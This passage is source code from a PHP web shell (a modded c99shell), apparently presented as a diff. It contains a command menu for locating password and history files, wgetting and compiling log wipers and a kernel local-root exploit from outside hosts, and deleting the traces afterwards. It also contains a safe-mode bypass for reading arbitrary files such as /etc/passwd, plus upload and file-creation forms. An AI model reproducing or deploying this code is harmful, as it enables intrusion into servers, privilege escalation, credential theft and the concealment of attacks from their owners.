VALUE="find / -type f -perm -2 -ls">Find all writable files + <OPTION VALUE="find . -type f -perm -2 -ls">Find all writable files in current directory + <OPTION VALUE="find / -perm -2 -ls">Find all writable directories and files + <OPTION VALUE="find . -perm -2 -ls">Find all writable directories and files in current directory + <OPTION VALUE="find / -type f -name service.pwd">Find all service.pwd files + <OPTION VALUE="find . -type f -name service.pwd">Find service.pwd files in current directory + <OPTION VALUE="find / -type f -name .htpasswd">Find all .htpasswd files + <OPTION VALUE="find . -type f -name .htpasswd">Find .htpasswd files in current directory + <OPTION VALUE="find / -type f -name .bash_history">Find all .bash_history files + <OPTION VALUE="find . -type f -name .bash_history">Find .bash_history files in current directory + <OPTION VALUE="find / -type f -name .mysql_history">Find all .mysql_history files + <OPTION VALUE="find . -type f -name .mysql_history">Find .mysql_history files in current directory + <OPTION VALUE="find / -type f -name .fetchmailrc">Find all .fetchmailrc files + <OPTION VALUE="find . -type f -name .fetchmailrc">Find .fetchmailrc files in current directory + <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs + <OPTION VALUE=""> + <OPTION VALUE="#"> [Directory Malipulation] + <OPTION VALUE=""> + <OPTION VALUE="pwd">List your current directory + <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Is /etc/ writable? + <OPTION VALUE="find / -type d -perm -2 -ls">Find all writable directories +<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory +<OPTION VALUE="find / -type d -perm -2 -ls">Find all writable directories +<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory +<OPTION VALUE=""> +<OPTION VALUE="#"> [Miscellaneous Commands] +<OPTION VALUE=""> + <OPTION VALUE="tar -cvf NEWTAR!!.tar -c <?php passthru('pwd'); ?>">Tar your current directory. (Only works if the directory is writable) + <OPTION VALUE="uname -a">Kernel version + <OPTION VALUE="w">Logged in users + <OPTION VALUE="lastlog">Last users to connect + <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins + <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">Users without passwords + <OPTION VALUE="cat /proc/version /proc/cpuinfo">CpuInfo + <OPTION VALUE="netstat -atup | grep IST">Open ports + <OPTION VALUE=""> + <OPTION VALUE="#"> [Application Verification] + <OPTION VALUE=""> + <OPTION VALUE="which wget curl w3m lynx">Check For Downloaders (WGET, et cetera) + <OPTION VALUE="locate gcc">Check For GCC + <OPTION VALUE=""> + <OPTION VALUE="#"> [Log Cleaners] + <OPTION VALUE=""> + <OPTION VALUE="wget http://packetstormsecurity.org/UNIX/penetration/log-wipers/logcleaner-0.3.c">Wipelogs (Part 1)(Zap3) + <OPTION VALUE="gcc logcleaner-0.3.c -o logcleaner-0.3">Wipelogs (Part 2)(Zap3) + <OPTION VALUE="./logcleaner-0.3 <? echo $_SERVER["REMOTE_ADDR"]; ?>">Wipelogs (Part 3)(Zap3) + <OPTION VALUE="Gone!<? if($_REQUEST['cmd']=="Gone!") { if (file_exists("logcleaner-0.3.c")) { unlink("logcleaner-0.3.c"); } if (file_exists("logcleaner-0.3")) { unlink("logcleaner-0.3"); } } ?>">Remove All Zap3 Traces + <OPTION VALUE=""> + <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/vanish.c">Wipelogs (Part 1)(Vanish) + <OPTION VALUE="gcc vanish.c -o vanish">Wipelogs (Part 2)(Vanish) + <OPTION VALUE="./vanish <? echo exec('whoami'); ?> <? echo $_SERVER["REMOTE_ADDR"]; ?> <? echo gethostbyname($_SERVER["HTTP_HOST"]); ?>">Wipelogs (Part 3)(Vanish) + <OPTION VALUE="Gone!!<? if($_REQUEST['cmd']=="Gone!!") { if (file_exists("vanish.c")) { unlink("vanish.c"); } if (file_exists("vanish")) { unlink("vanish"); } } ?>">Remove All Vanish Traces + <OPTION VALUE=""> + <OPTION VALUE="#"> [Root Exploits] + <OPTION VALUE=""> + <OPTION VALUE="wget http://www.synsta.templatez.org/1.txt">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 1) + <OPTION VALUE="mv 1.txt exploit.c">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 2) + <OPTION VALUE="gcc exploit.c -o exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 3) + <OPTION VALUE="./exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 4) + <OPTION VALUE="Gone!!!<? if($_REQUEST['cmd']=="Gone!!!") { if (file_exists("exploit.c")) { unlink("exploit.c"); } if (file_exists("1.txt")) { unlink("1.txt"); } if (file_exists("exploit")) { unlink("exploit"); } } ?>">Remove All Exploit Traces + </SELECT> + + <input type=hidden name="cmd_txt" value="1"> + &nbsp; + <input type=submit name=submit value="Execute"></div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center><br/><b> Kernel Information </b> +<form action=http://google.com/search name=f><input type=hidden name=client value="firefox-a"><input type=hidden name=rls value="org.mozilla:en-US:official_s"><input type=hidden name=hl value=en><input id=sf maxLength=256 name=q value="<?php echo wordwrap(php_uname()); ?>" size=80> +&nbsp; +<input type=submit value="Search" name=btnG></form> +</center> + </td> +</tr></TABLE> +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center"><strong>PHP Safe-Mode Bypass (Read Files) </strong></div> + <br> + <form action="<?php echo $surl; ?>" method="post"> + <div align="center"> + File: <input type="text" name="file"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> + <?php + function rsg_read() + { + $test=""; + $temp=tempnam($test, "cx"); + $file=$_REQUEST['file']; + $get=htmlspecialchars($file); + echo "</br>Trying To Get File <font color=#000099><b>$get</b></font><br>"; + if(copy("compress.zlib://".$file, $temp)){ + $fichier = fopen($temp, "r"); + $action = fread($fichier, filesize($temp)); + fclose($fichier); + $source=htmlspecialchars($action); + + + echo "<div class=\"shell\"></br><b>Reading $get:</b><br><br><textarea rows=10 cols=50>$source</textarea><br>"; + unlink($temp); + } else { + echo("</br><FONT COLOR=\"RED\"><CENTER>Sorry... File + <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have + access.</CENTER></FONT>"); + } + echo "</div>"; + } + + if(isset($_REQUEST['file'])) +{ +rsg_read(); +} + + ?> + + <? + + function rsg_glob() +{ +$chemin=$_REQUEST['directory']; +$files = glob("$chemin*"); +echo "</br>Trying To List Folder <font color=#000099><b>$chemin</b></font><br>"; +foreach ($files as $filename) { + echo "<pre>"; + echo "$filename\n"; + echo "</pre>"; +} +} + +if(isset($_REQUEST['directory'])) +{ +rsg_glob(); +} + +?> + + <br> + </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center> + <strong>PHP Safe-Mode Bypass (List Directories)</strong>: + <form action="<?php echo $surl; ?>" method="post"> + <div align="center"><br> + Dir: <input type="text" name="directory"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> + + </form></center> + </td> +</tr></TABLE> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="1" valign="top"><center> + <b>Search</b> + <form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> + <td width="50%" height="1" valign="top"><center> + <b>Upload</b> + <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> +</tr> +</table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center> + <b><strong>Create Directory + </strong> + <p><form action="<?php echo $PHP_SELF; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center> + <strong>Create File </strong> + <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> + +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center> + <b>Enter Directory </b> + <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center> + <b>Access File</b> + <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> +</td> +</tr> +</TABLE> +<br><TABLE width="100%" height=1 border=1 cellPadding=0 cellSpacing=0 borderColorLight=#c0c0c0 borderColorDark=#666666 bgColor=#333333 style="BORDER-COLLAPSE: collapse"> + <tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell modded by <a href=http://w4ck1ng.com class="style1">w4ck1ng</a>. | <? echo("$shver"); ?> | Page generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</p></td></tr></table> +<br/></body></html><?php chdir($lastdir); c99shexit(); ?> +